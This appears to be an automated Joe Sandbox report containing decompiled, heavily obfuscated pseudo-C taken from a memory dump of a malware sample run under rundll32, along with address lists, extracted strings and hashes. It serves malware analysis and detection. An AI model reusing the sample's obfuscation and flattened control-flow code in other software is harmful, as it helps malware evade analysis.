				_v1116 = 0x96ff;
				_t419 = 0x57;
				_v1116 = _v1116 / _t419;
				_t420 = 0x2e;
				_v1116 = _v1116 * 0x73;
				_v1116 = _v1116 ^ 0x0000c776;
				_v1172 = 0xd391;
				_v1172 = _v1172 ^ 0x157b14c0;
				_v1172 = _v1172 * 0x50;
				_v1172 = _v1172 ^ 0xb6ae4940;
				_v1124 = 0x910;
				_v1124 = _v1124 | 0x21848f96;
				_v1124 = _v1124 / _t420;
				_v1124 = _v1124 ^ 0x40ba88af;
				_v1184 = 0xee32;
				_t421 = 0x2c;
				_v1184 = _v1184 / _t421;
				_t416 = 0x76;
				_v1184 = _v1184 / _t416;
				_v1184 = _v1184 ^ 0x36b4769c;
				_v1184 = _v1184 ^ 0x36b471cf;
				_v1108 = 0x7793;
				_v1108 = _v1108 >> 2;
				_v1108 = _v1108 ^ 0x00007b9c;
				_v1152 = 0x27a4;
				_v1152 = _v1152 ^ 0x4cf8fd1c;
				_v1152 = _v1152 << 5;
				_v1152 = _v1152 ^ 0x9f1b270a;
				_v1096 = 0x7257;
				_t422 = 0x4b;
				_v1096 = _v1096 / _t422;
				_v1096 = _v1096 ^ 0x00001a70;
				_v1072 = 0xc442;
				_v1072 = _v1072 + 0xffffa97a;
				_v1072 = _v1072 ^ 0x00001782;
				_v1140 = 0x7f4b;
				_v1140 = _v1140 >> 3;
				_v1140 = _v1140 + 0xbe28;
				_v1140 = _v1140 ^ 0x0000c92f;
				_v1092 = 0x4ca3;
				_v1092 = _v1092 + 0x7881;
				_v1092 = _v1092 ^ 0x0000f626;
				_v1180 = 0x8651;
				_v1180 = _v1180 ^ 0xeaabcb2c;
				_v1180 = _v1180 << 2;
				_v1180 = _v1180 | 0xf896c20d;
				_v1180 = _v1180 ^ 0xfabf8607;
				_v1100 = 0x1dc8;
				_v1100 = _v1100 ^ 0x66731512;
				_v1100 = _v1100 ^ 0x66736931;
				_v1200 = 0xc5f3;
				_v1200 = _v1200 + 0x8fc6;
				_v1200 = _v1200 / _t416;
				_v1200 = _v1200 << 0x10;
				_v1200 = _v1200 ^ 0x02e51e11;
				_v1088 = 0x41d6;
				_v1088 = _v1088 + 0x25c7;
				_v1088 = _v1088 ^ 0x000051ef;
				_v1192 = 0xb126;
				_v1192 = _v1192 >> 1;
				_t423 = 0x2c;
				_v1192 = _v1192 * 0x2c;
				_v1192 = _v1192 + 0xd0fb;
				_v1192 = _v1192 ^ 0x00107545;
				_v1144 = 0xb5cd;
				_v1144 = _v1144 << 3;
				_v1144 = _v1144 | 0x639c5b66;
				_v1144 = _v1144 ^ 0x639df74d;
				_v1176 = 0x1cda;
				_v1176 = _v1176 << 0xc;
				_v1176 = _v1176 + 0xc74;
				_v1176 = _v1176 ^ 0x01cd87dc;
				_v1212 = 0xffdf;
				_v1212 = _v1212 ^ 0x705905f0;
				_v1212 = _v1212 + 0x3a87;
				_v1212 = _v1212 ^ 0x4d994128;
				_v1212 = _v1212 ^ 0x3dc37c3b;
				_v1160 = 0xe592;
				_v1160 = _v1160 + 0xffff7af6;
				_v1160 = _v1160 + 0x21a6;
				_v1160 = _v1160 ^ 0x000099fe;
				_v1216 = 0x5d93;
				_v1216 = _v1216 / _t423;
				_t424 = 0x5f;
				_v1216 = _v1216 / _t424;
				_v1216 = _v1216 << 7;
				_v1216 = _v1216 ^ 0x00007af6;
				_v1064 = 0x7bf2;
				_v1064 = _v1064 ^ 0x7bea2743;
				_v1064 = _v1064 ^ 0x7bea7dfd;
				_v1068 = 0x5f87;
				_t425 = 0x58;
				_v1068 = _v1068 * 0x3d;
				_v1068 = _v1068 ^ 0x0016e388;
				_v1136 = 0x6927;
				_v1136 = _v1136 + 0x22cf;
				_v1136 = _v1136 << 0xb;
				_v1136 = _v1136 ^ 0x045f9726;
				_v1080 = 0x5a06;
				_v1080 = _v1080 ^ 0xd495294a;
				_v1080 = _v1080 ^ 0xd495071f;
				_v1168 = 0x67d8;
				_v1168 = _v1168 >> 0xb;
				_v1168 = _v1168 ^ 0xd0f9ebfe;
				_v1168 = _v1168 ^ 0xd0f998db;
				_v1208 = 0x5daf;
				_v1208 = _v1208 ^ 0x72c29f92;
				_v1208 = _v1208 >> 0xb;
				_v1208 = _v1208 >> 4;
				_v1208 = _v1208 ^ 0x0000ccb7;
				_v1148 = 0xaaf5;
				_v1148 = _v1148 / _t425;
				_v1148 = _v1148 + 0xf41b;
				_v1148 = _v1148 ^ 0x0000cf1c;
				_v1060 = 0xbc92;
				_v1060 = _v1060 >> 6;
				_v1060 = _v1060 ^ 0x000059f5;
				_v1132 = 0x5b51;
				_v1132 = _v1132 >> 6;
				_v1132 = _v1132 >> 0xd;
				_v1132 = _v1132 ^ 0x00005492;
				_v1156 = 0x2926;
				_v1156 = _v1156 >> 1;
				_t426 = 0x1d;
				_v1156 = _v1156 / _t426;
				_v1156 = _v1156 ^ 0x00007d93;
				_v1164 = 0xe481;
				_v1164 = _v1164 | 0xb0f0019e;
				_v1164 = _v1164 + 0xffff19a4;
				_v1164 = _v1164 ^ 0xb0ef908e;
				_v1188 = 0xea1c;
				_v1188 = _v1188 << 7;
				_v1188 = _v1188 ^ 0x8bc700c2;
				_v1188 = _v1188 << 3;
				_v1188 = _v1188 ^ 0x5d904ba1;
				_v1196 = 0x497d;
				_v1196 = _v1196 ^ 0x0f8f9f9e;
				_t427 = 0x7d;
				_t417 = _v1056;
				_v1196 = _v1196 / _t427;
				_v1196 = _v1196 + 0xffff7281;
				_v1196 = _v1196 ^ 0x001f1fe0;
				_v1104 = 0xf165;
				_v1104 = _v1104 * 0x1c;
				_v1104 = _v1104 ^ 0x001a318e;
				_v1204 = 0x4454;
				_v1204 = _v1204 << 8;
				_v1204 = _v1204 + 0x9948;
				_v1204 = _v1204 ^ 0x85768e24;
				_v1204 = _v1204 ^ 0x8532788b;
				_v1128 = 0x5a6;
				_v1128 = _v1128 + 0xffff6706;
				_v1128 = _v1128 + 0x96e8;
				_v1128 = _v1128 ^ 0x00003de2;
				_v1112 = 0x9081;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 + 0xffff7063;
				_v1112 = _v1112 ^ 0x000847d9;
				_v1076 = 0xd6df;
				_v1076 = _v1076 ^ 0x5f39b33e;
				_v1076 = _v1076 ^ 0x5f391776;
				_v1120 = 0x3907;
				_v1120 = _v1120 << 9;
				_v1120 = _v1120 ^ 0xf6dcf0ac;
				_v1120 = _v1120 ^ 0xf6aef360;
				_v1084 = 0xfbcd;
				_v1084 = _v1084 + 0x4a35;
				_v1084 = _v1084 ^ 0x000128a7;
				do {
					while(_t471 != 0xd0f27c) {
						if(_t471 == 0xac71cf7) {
							E001B01E5(_v1112, _v1120, _t417, _v1084);
						} else {
							if(_t471 == 0x213c0eb7) {
								_t406 = E001A7F19(_v1188, _a4, _v1196, _t427, _v1104, _v1204, _v1128, _t417,  *_t473,  &_a4);
								_t474 =  &(_t474[8]);
								_t427 = 1;
								_t471 = 0xac71cf7;
								__eflags = _t406;
								_t470 =  !=  ? 1 : _t470;
								continue;
							} else {
								if(_t471 == 0x2e8890c5) {
									_t471 = 0x3b1efd3d;
									continue;
								} else {
									if(_t471 == 0x314b0d7f) {
										_push(_v1192);
										_push(_v1088);
										E001AE32E(E001A5EBA(_v1200, _a4, __eflags), __eflags, _v1176, _v1212,  &_v520, _v1160, 0x104, _a8, _v1216,  &_v1040, _v1056, _v1064);
										_t427 = _v1068;
										E001AED35(_v1068, _t407, _v1136, _v1080);
										_t474 =  &(_t474[0xe]);
										_t471 = 0x35d34524;
										continue;
									} else {
										if(_t471 == 0x35d34524) {
											_t427 = _v1168;
											_t412 = E001B7809(_v1168, _v1172, _v1208, _v1116, _v1148, _v1168, _v1060, _v1132, _v1156, 0, _v1168, _a8, _v1124, _v1164);
											_t417 = _t412;
											_t474 =  &(_t474[0xc]);
											__eflags = _t412 - 0xffffffff;
											if(__eflags != 0) {
												_t471 = 0x213c0eb7;
												continue;
											}
										} else {
											_t483 = _t471 - 0x3b1efd3d;
											if(_t471 != 0x3b1efd3d) {
												goto L15;
											} else {
												E001AD194(_v1184,  &_v1040, _t483, _t427, _v1108, _v1152);
												_t415 = E001B1489(_v1096, _v1072, _v1140,  &_v1040);
												_t474 =  &(_t474[5]);
												_t471 = 0xd0f27c;
												_t427 = 0;
												 *_t415 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t470;
					}
					E001B66AE(_v1092,  &_v520, __eflags, _v1180, _v1100);
					_pop(_t427);
					_t471 = 0x314b0d7f;
					L15:
					__eflags = _t471 - 0x365219c3;
				} while (__eflags != 0);
				goto L18;
			}

0x001a1b46
0x001a1b4c
0x001a1b5b
0x001a1b5d
0x001a1b68
0x001a1b6a
0x001a1b71
0x001a1b76
0x001a1b7d
0x001a1b89
0x001a1b8e
0x001a1b99
0x001a1b9c
0x001a1ba0
0x001a1ba8
0x001a1bb0
0x001a1bbd
0x001a1bc1
0x001a1bc9
0x001a1bd1
0x001a1be1
0x001a1be5
0x001a1bed
0x001a1bf9
0x001a1bfe
0x001a1c08
0x001a1c0d
0x001a1c13
0x001a1c1b
0x001a1c23
0x001a1c2e
0x001a1c36
0x001a1c41
0x001a1c49
0x001a1c51
0x001a1c56
0x001a1c5e
0x001a1c70
0x001a1c73
0x001a1c7a
0x001a1c85
0x001a1c90
0x001a1c9b
0x001a1ca6
0x001a1cae
0x001a1cb3
0x001a1cbb
0x001a1cc3
0x001a1cce
0x001a1cd9
0x001a1ce4
0x001a1cec
0x001a1cf4
0x001a1cf9
0x001a1d01
0x001a1d09
0x001a1d14
0x001a1d21
0x001a1d2c
0x001a1d34
0x001a1d44
0x001a1d4a
0x001a1d4f
0x001a1d57
0x001a1d62
0x001a1d6d
0x001a1d78
0x001a1d80
0x001a1d89
0x001a1d8c
0x001a1d90
0x001a1d98
0x001a1da0
0x001a1da8
0x001a1dad
0x001a1db5
0x001a1dbd
0x001a1dc5
0x001a1dca
0x001a1dd2
0x001a1dda
0x001a1de2
0x001a1dea
0x001a1df2
0x001a1dfa
0x001a1e02
0x001a1e0a
0x001a1e12
0x001a1e1a
0x001a1e22
0x001a1e32
0x001a1e3a
0x001a1e3f
0x001a1e45
0x001a1e4a
0x001a1e52
0x001a1e5d
0x001a1e68
0x001a1e73
0x001a1e86
0x001a1e87
0x001a1e8e
0x001a1e99
0x001a1ea1
0x001a1ea9
0x001a1eae
0x001a1eb6
0x001a1ec1
0x001a1ecc
0x001a1ed7
0x001a1edf
0x001a1ee4
0x001a1eec
0x001a1ef4
0x001a1efc
0x001a1f04
0x001a1f09
0x001a1f0e
0x001a1f16
0x001a1f24
0x001a1f28
0x001a1f32
0x001a1f3a
0x001a1f45
0x001a1f4d
0x001a1f58
0x001a1f60
0x001a1f65
0x001a1f6a
0x001a1f72
0x001a1f7a
0x001a1f84
0x001a1f89
0x001a1f8f
0x001a1f97
0x001a1f9f
0x001a1fa7
0x001a1faf
0x001a1fb7
0x001a1fbf
0x001a1fc4
0x001a1fcc
0x001a1fd1
0x001a1fd9
0x001a1fe1
0x001a1fed
0x001a1ff0
0x001a1ff7
0x001a1ffb
0x001a2003
0x001a200b
0x001a201e
0x001a2025
0x001a2030
0x001a2038
0x001a203d
0x001a2045
0x001a204d
0x001a2055
0x001a205d
0x001a2065
0x001a206d
0x001a2075
0x001a207d
0x001a2082
0x001a208a
0x001a2092
0x001a209d
0x001a20a8
0x001a20b3
0x001a20bb
0x001a20c0
0x001a20c8
0x001a20d0
0x001a20db
0x001a20e6
0x001a20f1
0x001a20f1
0x001a2103
0x001a2305
0x001a2109
0x001a210f
0x001a229e
0x001a22a5
0x001a22a8
0x001a22a9
0x001a22ae
0x001a22b0
0x00000000
0x001a2115
0x001a211b
0x001a2272
0x00000000
0x001a2121
0x001a2127
0x001a21e4
0x001a21ef
0x001a2244
0x001a2259
0x001a2260
0x001a2265
0x001a2268
0x00000000
0x001a212d
0x001a2133
0x001a21c3
0x001a21c7
0x001a21cc
0x001a21ce
0x001a21d1
0x001a21d4
0x001a21da
0x00000000
0x001a21da
0x001a2135
0x001a2135
0x001a213b
0x00000000
0x001a2141
0x001a2158
0x001a2177
0x001a217c
0x001a217f
0x001a2184
0x001a2186
0x00000000
0x001a2186
0x001a213b
0x001a2133
0x001a2127
0x001a211b
0x001a210f
0x001a230d
0x001a2319
0x001a2319
0x001a22d1
0x001a22d7
0x001a22d8
0x001a22dd
0x001a22dd
0x001a22dd
0x00000000

Strings

C'{, xrefs: 001A1E5D
'i, xrefs: 001A1E99
5J, xrefs: 001A20DB
Q[, xrefs: 001A1F58
1isf, xrefs: 001A1D21
2, xrefs: 001A1BED
}I, xrefs: 001A1FD9
TD, xrefs: 001A2030
=, xrefs: 001A206D
&), xrefs: 001A1F72
Wr, xrefs: 001A1C5E

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &)$'i$1isf$2$5J$C'{$Q[$TD$Wr$}I$=
API String ID: 0-3037410677
Opcode ID: 1622cefa847cf655726d64bbf067e72779b2e35e82bd58a16d4fe7f61b294505
Instruction ID: 0fd46bb7fee535ad5646cfe2e70ccf86b3ef69446b210c58d8bd2ea1f3332eb1
Opcode Fuzzy Hash: 1622cefa847cf655726d64bbf067e72779b2e35e82bd58a16d4fe7f61b294505
Instruction Fuzzy Hash: 5D0213715093809FE368CF25C94AA4BFBE1BBD5308F10891DF6D9862A0C7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B6E50, Relevance: 14.1, Strings: 11, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001B6E50(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				unsigned int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t259;
				void* _t290;
				void* _t305;
				short _t306;
				void* _t308;
				signed int _t310;
				signed int _t311;
				void* _t313;
				intOrPtr* _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int* _t366;
				void* _t368;

				_push(_a8);
				_t349 = _a4;
				_push(_t349);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t259);
				_v4 = _v4 & 0x00000000;
				_t366 =  &(( &_v112)[4]);
				_v16 = _v16 & 0x00000000;
				_v8 = 0xc55b8;
				_t313 = 0x7043439;
				_v32 = 0x3521;
				_v32 = _v32 + 0xfffff9a6;
				_v32 = _v32 ^ 0x0000d32e;
				_v40 = 0x5f7c;
				_t353 = 0x3b;
				_v40 = _v40 * 0x32;
				_v40 = _v40 ^ 0x0012febf;
				_v76 = 0xf853;
				_v76 = _v76 << 5;
				_v76 = _v76 / _t353;
				_t354 = 0x6a;
				_v76 = _v76 * 0x58;
				_v76 = _v76 ^ 0x002e2b77;
				_v60 = 0xe655;
				_v60 = _v60 * 0x6d;
				_v60 = _v60 * 0x5b;
				_v60 = _v60 ^ 0x22dc71db;
				_v80 = 0xaa71;
				_v80 = _v80 / _t354;
				_t355 = 0x6d;
				_v80 = _v80 / _t355;
				_v80 = _v80 + 0xcc1e;
				_v80 = _v80 ^ 0x0000f850;
				_v92 = 0x60c8;
				_v92 = _v92 << 3;
				_v92 = _v92 * 0x72;
				_v92 = _v92 | 0x792bb2c2;
				_v92 = _v92 ^ 0x797bd54a;
				_v96 = 0x3920;
				_v96 = _v96 | 0xc0389c27;
				_v96 = _v96 + 0xffff93af;
				_v96 = _v96 ^ 0x9f7d5bb0;
				_v96 = _v96 ^ 0x5f45636f;
				_v100 = 0x52c8;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0x001462cf;
				_v84 = 0xb8f3;
				_v84 = _v84 * 0x51;
				_v84 = _v84 * 0x31;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x0000d58d;
				_v44 = 0x8cd2;
				_v44 = _v44 ^ 0x7e5bfdd3;
				_v44 = _v44 ^ 0x7e5b077c;
				_v64 = 0x85cc;
				_t356 = 0x19;
				_t364 = _v12;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x5d497557;
				_v64 = _v64 ^ 0x5d61ea6d;
				_v88 = 0x1cc;
				_v88 = _v88 | 0xa1b25421;
				_v88 = _v88 << 7;
				_v88 = _v88 * 0x12;
				_v88 = _v88 ^ 0x45054652;
				_v112 = 0x7a7b;
				_v112 = _v112 >> 6;
				_v112 = _v112 + 0xffffebe6;
				_v112 = _v112 | 0xc08d8416;
				_v112 = _v112 ^ 0xffff9857;
				_v68 = 0xa823;
				_v68 = _v68 + 0xffff0029;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0xf509c3ed;
				_v48 = 0x9abc;
				_v48 = _v48 / _t356;
				_v48 = _v48 ^ 0x00000dea;
				_v104 = 0xfa7;
				_t357 = 0x1e;
				_v104 = _v104 / _t357;
				_v104 = _v104 ^ 0x620b429a;
				_t358 = 0xe;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x20d623b5;
				_v108 = 0x3bfe;
				_v108 = _v108 << 2;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 / _t358;
				_v108 = _v108 ^ 0x00000f77;
				_v28 = 0x49fd;
				_v28 = _v28 | 0x837d26d6;
				_v28 = _v28 ^ 0x837d0a4a;
				_v52 = 0xc7d9;
				_v52 = _v52 ^ 0x42f910e0;
				_v52 = _v52 << 0xb;
				_v52 = _v52 ^ 0xceb9e8cc;
				_v36 = 0x1b40;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x06d05680;
				_v56 = 0xe2ef;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x00000fef;
				_v72 = 0xd559;
				_v72 = _v72 << 0xe;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xcaee;
				_v72 = _v72 ^ 0x000161a9;
				_v20 = 0x6e34;
				_t359 = 0x2b;
				_v20 = _v20 / _t359;
				_v20 = _v20 ^ 0x00006ffc;
				_v24 = 0xbad8;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x0002832d;
				_t310 = _v12;
				_t360 = _v12;
				while(1) {
					while(1) {
						L2:
						_t368 = _t313 - 0x242c5c64;
						if(_t368 > 0) {
							break;
						}
						if(_t368 == 0) {
							_push(_t313);
							_push(_t313);
							_t364 = E001B922B(_t360 + _t360);
							_t366 =  &(_t366[3]);
							_t290 = 0x15197c39;
							_t313 =  !=  ? 0x15197c39 : 0x154d9440;
							continue;
						} else {
							if(_t313 == 0x7043439) {
								_t313 = 0x347128b1;
								continue;
							} else {
								if(_t313 == 0x9c4599b) {
									_t350 = _v16;
									_t360 = 0;
									_v12 = 0;
									if(_t350 != 0) {
										do {
											_t237 = _t350 + 8; // 0x6e3c
											_t308 = E001ABBEA(_v92, _v96, _t237, _v100);
											_t350 =  *((intOrPtr*)(_t350 + 0x218));
											_t360 = _t360 + 1 + _t308;
										} while (_t350 != 0);
										_v12 = _t360;
										_t290 = 0x15197c39;
									}
									_t313 = 0x242c5c64;
									goto L16;
								} else {
									if(_t313 == _t290) {
										_t351 = _v16;
										_t310 = 0;
										if(_t351 != 0) {
											do {
												_t224 = _t351 + 8; // 0x6e3c
												E001AD456(_t224, _v112, _t310 * 2 + _t364, _v68);
												_t305 = E001ABBEA(_v48, _v104, _t224, _v108);
												_t366 =  &(_t366[4]);
												_t311 = _t310 + _t305;
												_t306 = 0x2c;
												 *((short*)(_t364 + _t311 * 2)) = _t306;
												_t310 = _t311 + 1;
												_t351 =  *((intOrPtr*)(_t351 + 0x218));
											} while (_t351 != 0);
											_t290 = 0x15197c39;
										}
										_t360 = _v12;
										_t313 = 0x24e7e61f;
										L16:
										_t349 = _a4;
										continue;
									} else {
										if(_t313 != 0x154d9440) {
											L29:
											if(_t313 != 0x7703c73) {
												continue;
											} else {
											}
										} else {
											_t352 = _v16;
											if(_t352 != 0) {
												do {
													_t362 =  *(_t352 + 0x218);
													E001AE380(_v20, _t352, _v24);
													_t352 = _t362;
												} while (_t362 != 0);
											}
											_t349 = _a4;
										}
									}
								}
							}
						}
						L11:
						return 0 |  *_t349 != 0x00000000;
					}
					if(_t313 == 0x24e7e61f) {
						_t314 = _t349 + 4;
						 *(_t349 + 4) =  *(_t349 + 4) & 0x00000000;
						 *_t349 = E001ACA68(_v28, _v52, _v32, _t364, _t314, _v36, _t310 - 1);
						_t366 =  &(_t366[5]);
						_t313 = 0x339d5740;
						_t290 = 0x15197c39;
						goto L29;
					} else {
						if(_t313 == 0x339d5740) {
							E001AE380(_v56, _t364, _v72);
							_t313 = 0x154d9440;
							continue;
						} else {
							if(_t313 != 0x347128b1) {
								goto L29;
							} else {
								E001B6AD5(_v40, 0x1001cbb0, _v76, _v60,  &_v16, _v80);
								_t366 =  &(_t366[4]);
								_t313 = 0x9c4599b;
								while(1) {
									goto L2;
								}
							}
						}
					}
					goto L11;
				}
			}

0x001b6e57
0x001b6e5e
0x001b6e65
0x001b6e66
0x001b6e67
0x001b6e68
0x001b6e6d
0x001b6e75
0x001b6e78
0x001b6e7f
0x001b6e87
0x001b6e8c
0x001b6e94
0x001b6e9c
0x001b6ea4
0x001b6eb3
0x001b6eb6
0x001b6eba
0x001b6ec2
0x001b6eca
0x001b6ed7
0x001b6ee0
0x001b6ee3
0x001b6ee7
0x001b6eef
0x001b6efc
0x001b6f05
0x001b6f09
0x001b6f11
0x001b6f21
0x001b6f29
0x001b6f2c
0x001b6f30
0x001b6f38
0x001b6f40
0x001b6f48
0x001b6f52
0x001b6f56
0x001b6f5e
0x001b6f66
0x001b6f6e
0x001b6f76
0x001b6f7e
0x001b6f86
0x001b6f8e
0x001b6f9b
0x001b6f9f
0x001b6fa4
0x001b6fa9
0x001b6fb1
0x001b6fbe
0x001b6fc7
0x001b6fcb
0x001b6fd0
0x001b6fd8
0x001b6fe0
0x001b6fe8
0x001b6ff0
0x001b7001
0x001b7004
0x001b7008
0x001b700c
0x001b7014
0x001b701c
0x001b7024
0x001b702c
0x001b7036
0x001b703a
0x001b7042
0x001b704a
0x001b704f
0x001b7057
0x001b705f
0x001b7067
0x001b706f
0x001b7077
0x001b707c
0x001b7084
0x001b7094
0x001b7098
0x001b70a0
0x001b70ac
0x001b70b1
0x001b70b7
0x001b70c4
0x001b70c7
0x001b70cb
0x001b70d3
0x001b70db
0x001b70e0
0x001b70ed
0x001b70f1
0x001b70f9
0x001b7101
0x001b7109
0x001b7111
0x001b7119
0x001b7121
0x001b7126
0x001b712e
0x001b7136
0x001b713b
0x001b7143
0x001b7153
0x001b7158
0x001b7160
0x001b7168
0x001b716d
0x001b7172
0x001b717a
0x001b7182
0x001b718e
0x001b7191
0x001b7195
0x001b719d
0x001b71a5
0x001b71aa
0x001b71b2
0x001b71b6
0x001b71ba
0x001b71bf
0x001b71bf
0x001b71bf
0x001b71c5
0x00000000
0x00000000
0x001b71cb
0x001b72f9
0x001b72fa
0x001b7304
0x001b7306
0x001b7310
0x001b7315
0x00000000
0x001b71d1
0x001b71d7
0x001b72df
0x00000000
0x001b71dd
0x001b71e3
0x001b729d
0x001b72a1
0x001b72a3
0x001b72a9
0x001b72ab
0x001b72b3
0x001b72bb
0x001b72c0
0x001b72c8
0x001b72cb
0x001b72cf
0x001b72d3
0x001b72d3
0x001b72d8
0x00000000
0x001b71e9
0x001b71eb
0x001b7233
0x001b7237
0x001b723b
0x001b723d
0x001b724e
0x001b7254
0x001b7266
0x001b726b
0x001b726e
0x001b7272
0x001b7273
0x001b7278
0x001b7279
0x001b727f
0x001b7283
0x001b7283
0x001b7288
0x001b728c
0x001b7291
0x001b7291
0x00000000
0x001b71ed
0x001b71f3
0x001b73ab
0x001b73b1
0x00000000
0x00000000
0x001b73b7
0x001b71f9
0x001b71f9
0x001b71ff
0x001b7201
0x001b720b
0x001b7211
0x001b7216
0x001b7219
0x001b7201
0x001b721d
0x001b721d
0x001b71f3
0x001b71eb
0x001b71e3
0x001b71d7
0x001b7224
0x001b7232
0x001b7232
0x001b7323
0x001b7383
0x001b7386
0x001b739c
0x001b739e
0x001b73a1
0x001b73a6
0x00000000
0x001b7325
0x001b732b
0x001b736b
0x001b7371
0x00000000
0x001b732d
0x001b7333
0x00000000
0x001b7335
0x001b734f
0x001b7354
0x001b7357
0x001b71ba
0x00000000
0x001b71ba
0x001b71ba
0x001b7333
0x001b732b
0x00000000
0x001b7323

Strings

{z, xrefs: 001B7042
ocE_, xrefs: 001B6F86
ma], xrefs: 001B7014
d\,$, xrefs: 001B71BF
|_, xrefs: 001B6EA4
U, xrefs: 001B6EEF
), xrefs: 001B706F
d\,$, xrefs: 001B72D8
w+., xrefs: 001B6EE7
4n, xrefs: 001B7182
!5, xrefs: 001B6E8C

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !5$)$4n$U$d\,$$d\,$$ma]$ocE_$w+.${z$|_
API String ID: 0-1779222611
Opcode ID: a77011e898de34f33d08d76e73794c054eb70f468e52560bca3f2f632c94a460
Instruction ID: dcc7f5809afee0449cfc001ee13748302f1275a7fbf5e69fd1c6effe3af62ddf
Opcode Fuzzy Hash: a77011e898de34f33d08d76e73794c054eb70f468e52560bca3f2f632c94a460
Instruction Fuzzy Hash: DCE121715083418FD328CF26C48955BBBF1BBC4758F508A1DF5A69B2A0D7B4DA0ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 001ADD24, Relevance: 14.0, Strings: 11, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E001ADD24(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				char _t274;
				void* _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				void* _t319;
				void* _t353;
				intOrPtr _t354;
				char _t355;
				signed int _t356;
				signed int* _t359;

				_t353 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t274 = E001AD571(0);
				_v72 = _t274;
				_t359 =  &(( &_v192)[9]);
				_v84 = _t274;
				_t354 = _t274;
				_v80 = 0x11af16;
				_v76 = 0x9d98f;
				_t319 = 0xc3c7878;
				_v104 = 0x3a17;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 ^ 0x00000407;
				_v160 = 0xc6e9;
				_t310 = 0x4e;
				_v160 = _v160 / _t310;
				_t311 = 0xa;
				_v160 = _v160 / _t311;
				_v160 = _v160 ^ 0x00000061;
				_v116 = 0x5597;
				_v116 = _v116 + 0xffffb377;
				_v116 = _v116 ^ 0x000036c7;
				_v124 = 0x4920;
				_v124 = _v124 ^ 0x6a2619b6;
				_t312 = 0x77;
				_v124 = _v124 * 0x6d;
				_v124 = _v124 ^ 0x32501a9f;
				_v152 = 0xe00d;
				_v152 = _v152 / _t312;
				_v152 = _v152 >> 0xb;
				_v152 = _v152 ^ 0x00006bb9;
				_v140 = 0x38ec;
				_v140 = _v140 + 0xb90e;
				_v140 = _v140 + 0xffff4864;
				_v140 = _v140 ^ 0x00007d65;
				_v176 = 0x59b1;
				_v176 = _v176 ^ 0xc65f560a;
				_v176 = _v176 ^ 0x217efd0e;
				_v176 = _v176 + 0xfffff89a;
				_v176 = _v176 ^ 0xe721e38c;
				_v132 = 0xc712;
				_t313 = 0x78;
				_v132 = _v132 / _t313;
				_v132 = _v132 | 0xa8775bb8;
				_v132 = _v132 ^ 0xa8772a18;
				_v148 = 0xb13e;
				_v148 = _v148 >> 0xd;
				_v148 = _v148 ^ 0xa6c1fe5e;
				_v148 = _v148 ^ 0xa6c1a71d;
				_v88 = 0xefda;
				_v88 = _v88 * 0x57;
				_v88 = _v88 ^ 0x0051c79a;
